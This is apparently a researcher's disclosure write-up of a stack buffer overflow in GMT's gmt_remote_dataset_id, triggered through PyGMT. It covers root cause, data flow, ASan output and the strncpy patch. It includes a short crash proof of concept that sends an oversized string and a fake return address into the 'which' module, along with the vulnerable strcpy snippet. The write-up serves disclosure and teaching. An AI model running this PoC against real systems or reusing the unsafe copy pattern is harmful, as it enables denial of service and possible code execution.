Original advisory (GHSA): https://github.com/GenericMappingTools/gmt/security/advisories/GHSA-fqxx-62x7-9gwg

TL;DR

A stack-based buffer overflow in GMT (gmt_remote_dataset_id) can be triggered via PyGMT by supplying an oversized input. This results in memory corruption and may lead to Remote Code Execution (RCE) depending on the environment.

Overview

While analyzing Generic Mapping Tools (GMT) and its Python binding PyGMT, I discovered a stack-based buffer overflow vulnerability.

The issue occurs due to unsafe use of strcpy without bounds checking in a C-level function. Because PyGMT directly passes user input into GMT internals, this vulnerability becomes externally reachable.

Vulnerability Information

  • Type: Stack Buffer Overflow → Potential RCE
  • CWE: CWE-121
  • Affected Version: 6.6.0
  • Root Cause: Unsafe strcpy usage

Background

Initially, I reported an SSRF issue in PyGMT. However, the maintainers clarified that URL handling is an intended feature inherited from GMT's design.

This response led to a key realization:

If input is intentionally unrestricted at the Python layer, the real attack surface likely exists in the underlying C library.

So I shifted the analysis target from PyGMT to GMT itself.

Discovery Process

The investigation focused on how user input flows through PyGMT into GMT.

The key entry point:

Session.call_module()

This function forwards arguments directly into the GMT C API.

Hypothesis

"What happens if we pass an extremely long string?"

Test Payload

padding = "A" * 4096

Result

  • Program crashed with Segmentation Fault
  • AddressSanitizer confirmed stack-buffer-overflow

Further code review identified the vulnerable function:

gmt_remote_dataset_id()

Root Cause

The vulnerability originates from unsafe memory handling:

char file[PATH_MAX];
strcpy(file, input);

Problem

  • input is user-controlled
  • No length validation
  • Fixed-size stack buffer

Result

If input exceeds PATH_MAX:

  • Stack memory is overwritten
  • Adjacent memory corruption occurs

Data Flow

User Input (PyGMT)
    ↓
Session.call_module()
    ↓
GMT module ("which")
    ↓
gmt_remote_dataset_id()
    ↓
strcpy() → stack buffer overflow

The critical issue is that no validation exists at any layer.

Exploitation

PoC

import struct
from pygmt.clib import Session
with Session() as lib:
    padding = "A" * 4096
    fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
    payload = padding + fake_ret.decode("latin-1")
    lib.call_module("which", [payload])

Result

Segmentation fault

AddressSanitizer Output

ERROR: AddressSanitizer: stack-buffer-overflow
Function: gmt_remote_dataset_id

This confirms that the crash is caused by out-of-bounds write on stack memory.

Impact

Direct Impact

  • Application crash (DoS)
  • Memory corruption

Advanced Impact

  • Control flow hijacking
  • Return address overwrite
  • Potential Remote Code Execution (RCE)

Stack-based overflows are especially dangerous when combined with predictable memory layouts.

Attack Surface

This vulnerability is exploitable in:

  • Applications using PyGMT
  • Systems passing user input into GMT modules
  • Automated geospatial data pipelines

Because the entry point is Python, exploitation becomes significantly easier than targeting C binaries directly.

Bypass Analysis

This is not a logic bypass — it is a missing validation issue.

Observed problems:

  • Use of strcpy (no bounds check)
  • No input length validation
  • No defensive programming

Patch Analysis

The vulnerability was fixed by replacing unsafe copying logic.

Before

strcpy(file, input);

After

strncpy(file, input, sizeof(file) - 1);
file[sizeof(file) - 1] = '\0';

Key Improvements

  • Enforces boundary checks
  • Prevents buffer overflow
  • Ensures null termination

This patch effectively mitigates the issue.

Why This Matters

This vulnerability highlights a critical misconception:

"High-level languages make things safe."

In reality:

  • Python → passes input directly
  • C → executes unsafe memory operations

This creates a hidden attack surface where safe-looking APIs expose unsafe internals.

Key Insight

High-level interfaces do not eliminate low-level vulnerabilities — they expose them.

Conclusion

This case demonstrates how a classic memory safety issue in C can become externally exploitable through modern language bindings.

Although it may initially appear as a crash-level bug, its impact can escalate significantly depending on runtime conditions.

Contribution

  • Identified stack-based buffer overflow in GMT
  • Demonstrated crash via PyGMT interface
  • Confirmed memory corruption with ASan
  • Analyzed root cause and patch

References

  • GMT Security Advisory
  • Patch Commit
  • GHSA: Stack-based Buffer Overflow in gmt_remote_dataset_id